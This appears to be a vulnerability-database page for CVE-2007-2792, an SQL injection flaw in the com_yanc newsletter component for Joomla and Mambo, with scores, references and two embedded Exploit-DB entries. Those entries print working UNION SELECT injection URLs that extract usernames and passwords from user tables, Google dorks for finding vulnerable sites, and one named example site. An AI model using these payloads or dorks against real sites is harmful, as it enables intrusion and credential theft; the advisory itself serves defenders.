CVE-2007-2792
published 2007-05-22CVE-2007-2792: SQL injection vulnerability in the Yet another Newsletter Component (aka YaNC or com_yanc) component before 1.5 beta 3 for Mambo and Joomla! allows remote…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.76%
88.5th percentile
SQL injection vulnerability in the Yet another Newsletter Component (aka YaNC or com_yanc) component before 1.5 beta 3 for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands via the listid parameter to index.php. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| com_yanc | com_yanc | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component com_yanc - SQL Injection
exploitdb·2010-02-28
CVE-2007-2792 Joomla! Component com_yanc - SQL Injection
Joomla! Component com_yanc - SQL Injection
---
[»] Joomla com_yanc Remote Sql Injection Vulnerability
[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder: [ Snakespc Email:[email protected] - Site:sec-war.com/cc> ]
[»] Greetz to:[ His0k4, PrEdAtOr >>> All My Mamber >> sec-war.com/cc ]
[»] Dork: [inurl:index.php?option=com_yanc "listid" ]
###########################################################################
===[ Exploit ]===
[»] http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users--
[»]Author: Snakespc <-
###########################################################################
Exploit-DB
Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection
exploitdb·2007-05-17
CVE-2007-2792 Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection
Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection
---
Mambo com_yanc v1.4 beta (id) Blind Remote SQL Injection Vuln
Bulan: Cyber-Security
Exploit: index.php?option=com_yanc&Itemid=9999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
Example:http://www.tnrb.net/
google dork: inurl:index.php?option=com_yanc
# milw0rm.com [2007-05-17]
No writeups or analysis indexed.
http://osvdb.org/37948http://osvdb.org/62620http://packetstormsecurity.org/0806-exploits/joomlayanc-sql.txthttp://secunia.com/advisories/38780http://www.exploit-db.com/exploits/11603http://www.securityfocus.com/bid/24030http://www.securityfocus.com/bid/38454https://exchange.xforce.ibmcloud.com/vulnerabilities/56585https://www.exploit-db.com/exploits/3944http://osvdb.org/37948http://osvdb.org/62620http://packetstormsecurity.org/0806-exploits/joomlayanc-sql.txthttp://secunia.com/advisories/38780http://www.exploit-db.com/exploits/11603http://www.securityfocus.com/bid/24030http://www.securityfocus.com/bid/38454https://exchange.xforce.ibmcloud.com/vulnerabilities/56585https://www.exploit-db.com/exploits/3944
2007-05-22
Published